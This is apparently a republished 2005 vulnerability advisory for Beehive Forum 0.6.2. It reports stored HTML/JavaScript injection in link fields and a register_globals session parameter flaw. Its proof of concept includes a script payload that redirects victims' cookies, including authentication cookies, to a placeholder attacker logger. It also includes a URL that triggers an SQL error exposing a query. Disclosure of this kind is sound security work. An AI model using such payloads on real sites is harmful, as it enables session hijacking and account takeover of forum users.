beehiveforum Script Injection

2005.12.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

KAPDA New advisory Vendor: http://www.beehiveforum.net Vulnerable: Version 0.6.2 Bug: HTML Injection , Possible attacks with register_globals = On Exploitation: Remote with browser Description: -------------------- Beehive Forum is a PHP-based message board system that uses a MySQL database. Vulnerability: -------------------- -HTML Injection: The software does not properly filter HTML tags in "Name","Description" & "Comment" fields in 'links.php' & 'links_add.php' hat may allow a remote user to inject HTML/javascript codes. The hostile code may be rendered in the web browser of the victim user who will visit these pages. (persistent) POC: -------------------- COMMENT: very nice link ;)<script>document.location.replace='http://hackersite.com /cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script> As a result, the code will be able to access the target user's cookies (including authentication cookies) bh_sess_hash bh_remeber_username bh_remember_password bh_remeber_passhash -Possible attacks with register_globals = on When register_globals = on , malicious user may be able to set $user_sess variable unexpectedly. POC: -------------------- http://example.com/beehive/index.php?user_sess=k error: -------------------- Error Message for server admins and developers: Unknown error [1054] Unknown column 'k' in 'on clause' SELECT FORUMS.FID, FORUMS.WEBTAG, CONCAT(FORUMS.WEBTAG, '', '_') AS PREFIX, FORUMS.ACCESS_LEVEL, USER_FORUM.ALLOWED FROM FORUMS FORUMS LEFT JOIN USER_FORUM USER_FORUM ON (USER_FORUM.FID = FORUMS.FID AND USER_FORUM.UID = k) WHERE DEFAULT_FORUM = 1 Unknown error in line 138 of file db_mysql.inc.php -------------------- OR http://example.com/beehive/index.php?user_sess=1+MYFORUM ... The insufficient protection in index.php: $forum_settings = forum_get_settings(); include_once(BH_INCLUDE_PATH. "header.inc.php"); include_once(BH_INCLUDE_PATH. "html.inc.php"); include_once(BH_INCLUDE_PATH. "lang.inc.php"); include_once(BH_INCLUDE_PATH. "light.inc.php"); include_once(BH_INCLUDE_PATH. "logon.inc.php"); include_once(BH_INCLUDE_PATH. "messages.inc.php"); include_once(BH_INCLUDE_PATH. "session.inc.php"); $user_sess = bh_session_check(false); Solution: -------------------- There is no vendor supplied patch for this issue at this time. Original Advisories: -------------------- http://kapda.ir/advisory-158.html IN Farsi: http://irannetjob.com/content/view/177/28/ Credit : -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top